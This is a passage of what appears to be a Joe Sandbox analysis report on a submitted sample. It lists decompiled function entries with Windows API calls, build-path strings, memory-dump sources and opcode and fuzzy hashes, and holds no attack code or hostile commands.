                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ActiveWindow
                                                    • String ID: 4Vc$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp
                                                    • API String ID: 2558294473-343011873
                                                    • Opcode ID: f62b17e3abd777e837d9869f689bb76c09d270859d28ec5fd7486f87c34fe190
                                                    • Instruction ID: 1ef81301b84a2e0dbff19bf074a1bbcaec6430d1c8f3972fb4288d033947c89e
                                                    • Opcode Fuzzy Hash: f62b17e3abd777e837d9869f689bb76c09d270859d28ec5fd7486f87c34fe190
                                                    • Instruction Fuzzy Hash: 7D115734905288DECF05DBE8C954B9DBFB5BF55308F608098D002AB295EBB55B09CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    • 4Vc, xrefs: 00363691
                                                    • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00363654
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ActiveWindow
                                                    • String ID: 4Vc$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp
                                                    • API String ID: 2558294473-343011873
                                                    • Opcode ID: 138b804519865c529c5c989e708fb6db8205561c045681c80e57a798d4187442
                                                    • Instruction ID: 543eb82c509354d2be63d1c23ff05bd889f70ff2a9f3c529d9503a159714f957
                                                    • Opcode Fuzzy Hash: 138b804519865c529c5c989e708fb6db8205561c045681c80e57a798d4187442
                                                    • Instruction Fuzzy Hash: 4C115B34D05288EECF05DBE4C954B9DBBB5BF55304F60809DD0016B295DBB55B09CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetParent.USER32(0000000F), ref: 003780A2
                                                    Strings
                                                    • C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h, xrefs: 00378087
                                                    • Unknown exception, xrefs: 00378077
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Parent
                                                    • String ID: C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h$Unknown exception
                                                    • API String ID: 975332729-9186675
                                                    • Opcode ID: bd8371261fc212afb19fbd4ff932e82998b10a28642c2e46a32b176a6c8f835e
                                                    • Instruction ID: a8d96acf954632642a132cdc2bb0c9842e74952789daa75076dfc77b0ddd5503
                                                    • Opcode Fuzzy Hash: bd8371261fc212afb19fbd4ff932e82998b10a28642c2e46a32b176a6c8f835e
                                                    • Instruction Fuzzy Hash: 64016D34D05288EFCB05EBE4C915BDDBFB0BF15304F548498E4416B296DBB9AE08DB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    • Unknown exception, xrefs: 003636EA
                                                    • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 003636FD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ActiveWindow
                                                    • String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
                                                    • API String ID: 2558294473-2631306498
                                                    • Opcode ID: 362a54f916b4b1922e5808c7a6ddb2db203dbf32ec78bf616afbac99ca241455
                                                    • Instruction ID: 40fa72c44b57d6d48269df22d4b8fe32753ce6e961d420850f93b659ae800bb0
                                                    • Opcode Fuzzy Hash: 362a54f916b4b1922e5808c7a6ddb2db203dbf32ec78bf616afbac99ca241455
                                                    • Instruction Fuzzy Hash: 33014C34D05288EECF06EBE8C955BCDBFB0BF55304F548498D4416B296DBB46B08D792
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    • Unknown exception, xrefs: 00363376
                                                    • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00363386
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ActiveWindow
                                                    • String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
                                                    • API String ID: 2558294473-2631306498
                                                    • Opcode ID: 5d6a7558db040a52ec92d27c354f7e528ac9d34e198062307766de5447e38805
                                                    • Instruction ID: 8c468e2596892e4a1304ebdfa1bccbc2faf9c64bb6a1b72354045abb438dd172
                                                    • Opcode Fuzzy Hash: 5d6a7558db040a52ec92d27c354f7e528ac9d34e198062307766de5447e38805
                                                    • Instruction Fuzzy Hash: 14014C34D05288DECF06DBE4C915BDDBFB0BF55304F548498D4416B296DBB45B08D7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00369C30: InitializeCriticalSectionAndSpinCount.KERNEL32(00637D50,00000000,D13B3340,00350000,Function_001F7F70,000000FF,?,0051F6C3,?,?,?,00357586), ref: 00369C55
                                                      • Part of subcall function 00369C30: GetLastError.KERNEL32(?,0051F6C3,?,?,?,00357586), ref: 00369C5F
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00357586), ref: 0051F6C7
                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00357586), ref: 0051F6D6
                                                    Strings
                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0051F6D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                    • API String ID: 450123788-631824599
                                                    • Opcode ID: 1d3eb5016dbf4a9319d8528e537a06f9e42dfa7230b27fce57d65e4e9714b1b1
                                                    • Instruction ID: 0f7a9b74110c1e2990743818220f01511abbc93f059eddf51fe0791374273c3d
                                                    • Opcode Fuzzy Hash: 1d3eb5016dbf4a9319d8528e537a06f9e42dfa7230b27fce57d65e4e9714b1b1
                                                    • Instruction Fuzzy Hash: 83E092742007518FE330DF64E9087967FE4BF15344F00882DE886C3651EBB5D488CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemTimePreciseAsFileTime.KERNEL32(?,0051F431,?,?,?,?,00486881), ref: 0051F687
                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,0051F431,?,?,?,?,00486881), ref: 0051F68B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Time$FileSystem$Precise
                                                    • String ID: `{5
                                                    • API String ID: 743729956-770602540
                                                    • Opcode ID: af41de1182a180c4f64f0c1ee8cfd2a2c22e34cc25255464d6ca8193dca370c5
                                                    • Instruction ID: 2f1ce8bfc11aba81a26a1118054ad07433b696381991502f350def1852bd76f7
                                                    • Opcode Fuzzy Hash: af41de1182a180c4f64f0c1ee8cfd2a2c22e34cc25255464d6ca8193dca370c5
                                                    • Instruction Fuzzy Hash: C1D01236905938DB9B113B94FD045FD7F19FF09B513090169E9065B130CF715C51ABD5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00546D52
                                                      • Part of subcall function 0051D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0051D448
                                                      • Part of subcall function 0051D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051D4B0
                                                      • Part of subcall function 0051D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051D4C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID: [mT$mT
                                                    • API String ID: 697777088-2281772909
                                                    • Opcode ID: a560672251ff35dddbcd660b67327c245a1f4a18108a2c1ace6fa3500a83ad85
                                                    • Instruction ID: 453eab86b4f4726bc2868a980a15c66393e329d46c3299f9be1a65a094e3ad25
                                                    • Opcode Fuzzy Hash: a560672251ff35dddbcd660b67327c245a1f4a18108a2c1ace6fa3500a83ad85
                                                    • Instruction Fuzzy Hash: 41B012D135D5127C3148530C7C07D7609EDD0C1B14731853AF400C8040D4C05C8024B3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00546D52
                                                      • Part of subcall function 0051D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0051D448
                                                      • Part of subcall function 0051D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051D4B0
                                                      • Part of subcall function 0051D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051D4C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID: @mT$mT
                                                    • API String ID: 697777088-2794769345
                                                    • Opcode ID: d91c323495dd08885a82312959675fd045293117090ef6780b33706cd2aa38d9
                                                    • Instruction ID: 0c94cc489425d7caf45523e5bc70cacbdc29cb5123cc64fce2d2c779665345ad
                                                    • Opcode Fuzzy Hash: d91c323495dd08885a82312959675fd045293117090ef6780b33706cd2aa38d9
                                                    • Instruction Fuzzy Hash: E2B012E135C4117D3108130C7D07C760DEDE0D1B15B31843AF401C804095C05C4114B3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00546D52
                                                      • Part of subcall function 0051D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0051D448
                                                      • Part of subcall function 0051D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051D4B0
                                                      • Part of subcall function 0051D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051D4C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID: ymT$mT
                                                    • API String ID: 697777088-604421448
                                                    • Opcode ID: 6b30953c6cf58eecd89b3d1bae3804c8134a9795f864c53b51aae1625c7e1ff8
                                                    • Instruction ID: 380ea728ea740289677eaf89bc7e89a290f9ee96b3c89d599cd0ecffa739b8bf
                                                    • Opcode Fuzzy Hash: 6b30953c6cf58eecd89b3d1bae3804c8134a9795f864c53b51aae1625c7e1ff8
                                                    • Instruction Fuzzy Hash: A5B012D135D5127C3108930CBC07D7609ADD0C1B14331853AB440C8040D4C05C8024B3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00546D52
                                                      • Part of subcall function 0051D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0051D448
                                                      • Part of subcall function 0051D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051D4B0
                                                      • Part of subcall function 0051D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051D4C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID: emT$mT
                                                    • API String ID: 697777088-1861356589
                                                    • Opcode ID: 3a4593649b5ba6f27f8eedde6605fb9fe8ac02045e3944daa4c15fea6cdaeed9
                                                    • Instruction ID: 2cc527b6faaaffc7813be119ea63183f04ce1072d6a1f7320ac7a0f457532bac
                                                    • Opcode Fuzzy Hash: 3a4593649b5ba6f27f8eedde6605fb9fe8ac02045e3944daa4c15fea6cdaeed9
                                                    • Instruction Fuzzy Hash: 7DB012D135C8117C35185B0D7C0BD7609ADE0C1B143318C3AB400C8080D4C05C4014B3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00546D52
                                                      • Part of subcall function 0051D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0051D448
                                                      • Part of subcall function 0051D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051D4B0
                                                      • Part of subcall function 0051D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051D4C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID: vc$mT
                                                    • API String ID: 697777088-3068329156
                                                    • Opcode ID: 40910d30667bdc24fced1d46e01c6804ca3b728a17588b936323313339af974d
                                                    • Instruction ID: db3feb5f5c4b4a5bc0f606557262639d40169afe97ba616e2568120c4a74e482
                                                    • Opcode Fuzzy Hash: 40910d30667bdc24fced1d46e01c6804ca3b728a17588b936323313339af974d
                                                    • Instruction Fuzzy Hash: 03B012D235C8157C3148570C7C07D7609EDE0C1B14731843AF400C8040D4C05C4014B3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00546D52
                                                      • Part of subcall function 0051D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0051D448
                                                      • Part of subcall function 0051D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051D4B0
                                                      • Part of subcall function 0051D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051D4C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID: mT$uc
                                                    • API String ID: 697777088-3174428877
                                                    • Opcode ID: a91f2ad5b82d0e816f7b6d7a4cc99960bb02e1a451bdec91f89adb31a5fb21f3
                                                    • Instruction ID: 072f3dc4cec5c8501c27915c75c488082cc7b8a518d137a8a675582710989d01
                                                    • Opcode Fuzzy Hash: a91f2ad5b82d0e816f7b6d7a4cc99960bb02e1a451bdec91f89adb31a5fb21f3
                                                    • Instruction Fuzzy Hash: 57B012D135C0117C310C530C7C06DB609EDD0C1B24371C43BB800C8040D8C09C4018B3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%